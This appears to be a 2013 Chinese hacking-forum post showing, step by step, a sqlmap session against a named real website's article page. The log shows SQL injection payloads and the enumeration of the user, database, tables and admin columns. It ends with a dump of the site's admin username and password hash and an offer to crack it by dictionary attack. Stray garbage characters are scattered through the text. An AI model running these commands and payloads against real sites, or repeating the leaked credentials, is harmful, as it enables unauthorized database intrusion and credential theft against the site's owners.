找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2355|回复: 0
打印 上一主题 下一主题

sqlmap实例注入mysql

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 22:18:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
3 ^' H6 X9 m4 r) wms "Mysql" --current-user       /*  注解:获取当前用户名称1 l# n+ a3 z- }. Q; ?- j2 F% U
    sqlmap/0.9 - automatic SQL injection and database takeover tool$ ^, O1 Y1 N; J: D
    http://sqlmap.sourceforge.net
  • starting at: 16:53:54  |' i9 {9 L. i* V
    [16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as$ |" [* z$ I* A4 }
    session file
    . P7 c8 h& L5 c8 b/ ?& N7 }[16:53:54] [INFO] resuming injection data from session file
    & ?: d; w* g% j' c[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file' `  [7 O: ^2 f( H
    [16:53:54] [INFO] testing connection to the target url% @% F5 k/ \- y! G8 N/ {4 E
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    5 |: t2 {0 e1 M* A; Z, k. D0 bsts:
    8 ?! ^# L- o, p) E% R. d* ]5 g---
      ^% s% ^6 z( H1 ~. cPlace: GET
    + R5 Y9 }, y; Q4 p1 ]# z: ~9 p1 LParameter: id; z5 Q2 n  V8 `6 R" R2 r
        Type: boolean-based blind0 ^& j( E8 ~& M  G5 \: k! s
        Title: AND boolean-based blind - WHERE or HAVING clause; ^  F2 Z3 D+ G
        Payload: id=276 AND 799=799
    ! g. i; \. E9 `- n; u    Type: error-based
    5 N: A1 H% v- I' R. ]* p    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause9 |+ V8 C; F6 Q
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,: W9 d1 w. _0 u
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    8 r( A3 z7 G, i) L2 ~* \# S),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)2 `6 u) N2 r4 t/ M% B; Z5 W
        Type: UNION query
    - W1 B! R* Q* X8 @+ i    Title: MySQL UNION query (NULL) - 1 to 10 columns9 R: ]% a7 {/ T1 j
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    ! a7 G) ^7 P' D* `/ T- U1 ]( f$ H(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),9 Y  [; U/ H( n, s3 }- X
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#8 q, D5 Z# C0 P. V! C
        Type: AND/OR time-based blind
    % p4 _! }# f: @0 V; e! J    Title: MySQL > 5.0.11 AND time-based blind& E% l8 O" L- C' r
        Payload: id=276 AND SLEEP(5)
    & s2 Y$ Z) u2 P  z( Y---
    ; O) o1 l2 D( C/ @5 J[16:53:55] [INFO] the back-end DBMS is MySQL
    0 s+ `7 ]: @5 A( Mweb server operating system: Windows
    $ K' H( f8 {3 e* z0 K6 F' {+ A2 ]web application technology: Apache 2.2.11, PHP 5.3.00 b$ Q3 z1 o2 A7 `
    back-end DBMS: MySQL 5.05 J4 E! Z" K, z7 q; u
    [16:53:55] [INFO] fetching current user
    6 _" C+ t4 }- Z6 }: Kcurrent user:    'root@localhost'   & j/ p) T+ l; r' n* F- g& [8 }& F
    [16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou- S; Z2 `5 R8 `
    tput\www.wepost.com.hk'
  • shutting down at: 16:53:58
    9 _  U- p% y2 _: l
    ( c' q  b# H7 N7 F: Y/ bD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    ! H. _4 K! e  m: R3 j! Bms "Mysql" --current-db                  /*当前数据库$ r/ `$ ^; Z1 v0 x) J5 ~
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    1 z/ S/ O# j; v" S# C    http://sqlmap.sourceforge.net
  • starting at: 16:54:16+ j+ a* q" G6 |% N9 c+ K6 b
    [16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    4 z, Q" y0 R0 f9 K2 C: ?- B session file
    3 H" ~5 L: K1 t[16:54:16] [INFO] resuming injection data from session file
    1 |7 i3 V' H4 y3 c[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file4 |. L- K( ^! R; Z% U5 f
    [16:54:16] [INFO] testing connection to the target url2 Z( ]  D' W) U
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
      D$ ]% `3 `& R5 Gsts:
    5 p5 n  _  b( _0 F& V, u---5 r: @+ h9 [; {" M; i( A
    Place: GET
    4 t8 w# j+ q2 D; X4 t# PParameter: id
    6 O& P/ t8 Z6 N# C0 ^, H5 z8 K    Type: boolean-based blind
    % S1 d- j0 }* |0 F! J    Title: AND boolean-based blind - WHERE or HAVING clause
    % R2 U$ Z! I$ a5 ^# Y$ b2 M. u6 w    Payload: id=276 AND 799=799
    7 |7 }* \; G; p6 y- j2 R1 [$ u    Type: error-based: c  c2 z1 r6 R) `
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause) d6 C/ D8 c6 `1 M
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,4 s+ x8 z8 U& b4 F8 x  d
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    4 V/ L1 m) A9 @5 `),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    5 q) o% _5 p7 h" M' l    Type: UNION query
    + G  A5 V1 P& ^    Title: MySQL UNION query (NULL) - 1 to 10 columns
    ( d# t5 G5 E7 K2 B    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    4 S$ I. W. e4 p2 o# Y+ u- o(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    , D7 `0 w3 ~  H9 a, c! ~: {CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#4 A9 \' q: z( ]/ Z. V
        Type: AND/OR time-based blind
      T( t8 l6 F5 P% ^$ t    Title: MySQL > 5.0.11 AND time-based blind
    " V1 C+ s- h) ~. o6 z    Payload: id=276 AND SLEEP(5)4 v; s) q! N6 L0 z& S# _9 o
    ---
    " E# R" _* ^4 E1 }# O[16:54:17] [INFO] the back-end DBMS is MySQL
    9 M# ?6 p5 s' U$ w8 `: X3 e: L" Zweb server operating system: Windows
    ; Y3 K7 R7 b& v* a& d" f: Uweb application technology: Apache 2.2.11, PHP 5.3.0% g- a, G/ a3 T; i, ]
    back-end DBMS: MySQL 5.0' S- n3 T8 M7 r* o
    [16:54:17] [INFO] fetching current database
      k4 R. B* R6 m8 Gcurrent database:    'wepost'
    # G' U; u% ?7 [/ q8 ^* y- O7 @[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou1 [/ i* @2 D8 [2 J$ L* e& X7 L! ]
    tput\www.wepost.com.hk'
  • shutting down at: 16:54:18
    1 a( h' z& Y) N& m0 P7 OD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db  {* w  D/ {& p# B* F
    ms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名$ C2 {6 b  h1 A
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    9 z" ?/ S( f$ y+ ~7 X1 m    http://sqlmap.sourceforge.net
  • starting at: 16:55:25
    2 p2 n: _, d, I+ Z[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as" P. l/ w! f' A6 _; S$ |: e! o0 e
    session file
    $ i9 q6 m$ [1 |5 x4 g+ E3 N[16:55:25] [INFO] resuming injection data from session file
    ( T3 q7 J/ s0 n0 t! k[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
      d) d$ K  @0 c[16:55:25] [INFO] testing connection to the target url9 r  f' y# o2 |0 K- B/ A
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque2 w% ?+ Q. R. J) d2 _! W$ w
    sts:1 k8 M, b- I+ S9 M0 n7 W
    ---) S( Y7 ?2 X, {2 c9 S
    Place: GET
    9 p: R' o# I- ]5 eParameter: id
    8 b, E+ P8 P. s) U7 b, Q4 E    Type: boolean-based blind- j3 z  ~  U# D9 Z
        Title: AND boolean-based blind - WHERE or HAVING clause
    ! C' u7 N! F$ k) s( `3 ^    Payload: id=276 AND 799=7999 }; K9 k8 R- U  x) U8 e
        Type: error-based- T1 s# {2 X  O' h# G8 d
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause& e! D/ f$ C/ }! C- S, T& _3 d
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    - b, J  h: W. C- \6 g+ X120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    - C# u& K! A  r# u& g),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    * p4 ~! i, ]9 l    Type: UNION query
    * Q( }2 M3 B  P; }, Z    Title: MySQL UNION query (NULL) - 1 to 10 columns5 m+ d* |0 ^7 ^& p9 {- r
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR) |2 E' @! C  f- g& n( f
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),. A- h) C8 B3 y3 F3 m
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    / O4 x4 e( c. g$ G1 ~$ g1 V6 j    Type: AND/OR time-based blind1 n/ M3 {' U1 {  I
        Title: MySQL > 5.0.11 AND time-based blind8 R7 m: G$ N$ [, o& }* G- Z
        Payload: id=276 AND SLEEP(5)7 P4 L% H. _& M9 T+ E
    ---
    8 q* M9 H5 e6 S! H2 q8 i[16:55:26] [INFO] the back-end DBMS is MySQL8 D+ Z! w: u. \+ {+ L
    web server operating system: Windows
    1 d: d) G7 i2 C, D# _web application technology: Apache 2.2.11, PHP 5.3.0
    " g5 [6 `) N) y& ]1 V) A3 Xback-end DBMS: MySQL 5.0- q3 b2 }$ x; R  B% X
    [16:55:26] [INFO] fetching tables for database 'wepost'8 |9 B$ z! ~% ?) q" q6 D0 }' `' V" q
    [16:55:27] [INFO] the SQL query used returns 6 entries- L5 H' t+ a% M6 J2 L  g7 s0 X
    Database: wepost
    4 C; P7 p. D0 i4 N[6 tables]
    2 z+ ~9 [) @$ W9 Z3 h+-------------+( a% H+ `3 ^' S
    | admin       |' w* b& |: s  e, [" k! m: J; E
    | article     |
      y# K1 m# ~! C$ q% x| contributor |
    4 L8 p- \6 s- B& ]| idea        |3 ^/ Y* o' O" [5 l1 ~( E
    | image       |
    + X: C/ L) T9 V$ a2 p; D3 J6 f/ S| issue       |5 M$ e6 V! A5 |4 T7 h& A8 J' b7 F5 W
    +-------------+
    ' ~( ]( a$ N9 s7 p. S  n, @$ H[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou# s$ P. I$ ^2 \
    tput\www.wepost.com.hk'
  • shutting down at: 16:55:33
    2 i* s  p  v& A# N2 a2 ]; c! O! D+ q: c# K
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    : Z% j  a: k/ f* xms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名' K9 J9 [" @% h+ ^; p# T3 [! t" }
        sqlmap/0.9 - automatic SQL injection and database takeover tool0 V1 Y2 p! i, }. s
        http://sqlmap.sourceforge.net
  • starting at: 16:56:06+ V6 f  P3 k% S, c8 e4 j7 I
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque1 u  U4 Z/ @+ Q  H+ [. e9 R
    sts:
    7 s' P- e* P, x# S' I---
    ( w' H; V, [$ O8 ?: c" N* A9 fPlace: GET% [4 j) f1 \3 h  D" W0 `2 N
    Parameter: id" [2 r: q4 k* U2 j
        Type: boolean-based blind! d. x$ @3 s9 t; ^' P
        Title: AND boolean-based blind - WHERE or HAVING clause$ ^( ]) D3 V/ a5 r/ [8 w9 U
        Payload: id=276 AND 799=799
    $ B% ?. R3 a# z5 Z- O) M- J- a# e    Type: error-based+ `  E; u7 f( I5 Y1 P
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    4 `4 s+ ]1 a* A' O! A+ w2 F    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,+ @' ~5 f) n5 B2 b' \
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    " H5 e% k1 ~% ?1 p8 t1 r),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    7 v6 f( j1 {7 k1 S+ l0 i- ^0 ^9 l    Type: UNION query) ~& f. W% T  V
        Title: MySQL UNION query (NULL) - 1 to 10 columns! W. o$ K) O, z* M$ m6 W3 S' I
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    ; N5 T: a) Y1 f(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),* h0 M2 h3 u. r# A7 g
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#6 r9 u6 w9 @) E: }
        Type: AND/OR time-based blind
    ) x3 f: w# M! y# ^9 U* a, e    Title: MySQL > 5.0.11 AND time-based blind& v2 k1 w: v  g4 Q
        Payload: id=276 AND SLEEP(5)1 V: e( m- O6 U
    ---
    % [, L# v7 Q% z* Sweb server operating system: Windows
      z; |6 q$ W. p" {3 tweb application technology: Apache 2.2.11, PHP 5.3.0: v: O/ N! m: n) z3 w2 ]0 i
    back-end DBMS: MySQL 5.0
    3 [* A( x8 [3 e( Z* h! w7 }+ c[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
    5 Z. |7 A- ?  @& Wssion': wepost, wepost
    ; O% Z8 Z' ]) ~' e' P, [Database: wepost
    " I/ x) N1 l- G- x% D2 L" hTable: admin
    5 k0 A/ Z0 ?5 l8 l1 F6 j- N; X[4 columns]
    ; j/ {5 S7 ~0 T8 n4 {- N+----------+-------------+
    ) h+ L- c$ a  q# [6 F4 o| Column   | Type        |! E5 ?: q) H% }% W' R  u% n
    +----------+-------------+
    6 D* I7 e+ {  M4 h; ^! d& C0 ~| id       | int(11)     |
    / w/ r1 F' n2 j| password | varchar(32) |
    , t0 U% f/ ]4 B0 l| type     | varchar(10) |
    / e$ q2 q0 g; T, S1 Y| userid   | varchar(20) |; J1 h. W8 S$ ?2 q8 W# b- o9 o
    +----------+-------------+
    7 t  \- r  c0 D8 l+ j) a
  • shutting down at: 16:56:19; `) v8 K6 t( z

    $ H& Q6 T3 I9 @+ q# P9 QD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    + B  c% ?0 |* ]) F: pms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容
    / s; V. e/ r4 g$ H9 W0 t6 d" ^    sqlmap/0.9 - automatic SQL injection and database takeover tool
    # W8 ?: q' b4 [  |1 U/ t' Z    http://sqlmap.sourceforge.net
  • starting at: 16:57:14# P4 p1 w# g' @3 b8 D5 R( K
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque5 x; }9 c$ Y! t6 U4 [4 ]$ e
    sts:
    , N. u. X7 q& l, Y8 [5 q4 H---
    8 Y& S( N, D/ C, z4 PPlace: GET
    & q9 D6 c% \+ N) r' w8 KParameter: id
    3 F0 ^- U. @/ i    Type: boolean-based blind
    5 j; ~3 O1 U( q0 X    Title: AND boolean-based blind - WHERE or HAVING clause$ ^3 C. v" O6 ~. s
        Payload: id=276 AND 799=799  q4 q+ ?) a( R" K# j1 M/ \$ ^+ |
        Type: error-based9 Y7 _- I# {- K4 ]2 B7 }
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause5 U' x0 H9 _4 u8 B; A
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,- b  K1 ]! `' K/ i- p3 P
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    ; j' {4 Q' Z  k0 @$ l+ I),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    , t+ {$ B8 s! V9 W- Q. D' W2 W+ @    Type: UNION query/ b# W9 K& `! Y4 ~* u
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    # F6 Z% U) u4 b% r' ~    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR: [  @0 L9 l- _) L% Z. y' |
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    : Q: n* R( l( v( S8 |CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#5 J5 ~9 Y# B' p. O! C% D
        Type: AND/OR time-based blind6 l: ?' u; V3 P5 x& q4 b
        Title: MySQL > 5.0.11 AND time-based blind% Q5 T7 B3 o0 T6 B7 V) f. `; F( e
        Payload: id=276 AND SLEEP(5): o" |& }; N# F! s& h& L* S
    ---
    ! q" v9 {5 C* ^: @* ?5 D6 Fweb server operating system: Windows  I* f8 W- w7 O7 E
    web application technology: Apache 2.2.11, PHP 5.3.0
    7 x' f: Z' d- v+ U! ~4 i8 K/ Y8 ?' ?back-end DBMS: MySQL 5.0; q; |; ^, M" B! [8 `( }1 E
    recognized possible password hash values. do you want to use dictionary attack o
    % Z# e6 V9 |" C; Q$ F7 Jn retrieved table items? [Y/n/q] y
    $ o, d8 U0 p' A+ w* b! e1 wwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]$ x  T9 _) b0 o% [
    do you want to use common password suffixes? (slow!) [y/N] y
    3 v! |6 u+ h  sDatabase: wepost
    ' J8 \# |# Q( S: J$ ^Table: admin
    1 `% m3 g3 c" t7 A[1 entry]8 j! R: W# ^  u9 l
    +----------------------------------+------------+
    + \6 i4 N$ E5 T. B| password                         | userid     |
    8 m# A2 i) r6 F+ f+----------------------------------+------------+
    - i9 X1 p7 I5 d9 u. v| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
    # B6 R: [2 K/ n- y$ H/ ~+ T2 I+----------------------------------+------------+
    / Z, Q8 m$ f- ]- O1 t# e% k( L1 K
  • shutting down at: 16:58:14
    ! Z, @5 n  Q" `7 a9 I3 C: K  l+ d0 K2 p7 K- V) a/ E& P
    D:\Python27\sqlmap>
  • 回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    快速回复 返回顶部 返回列表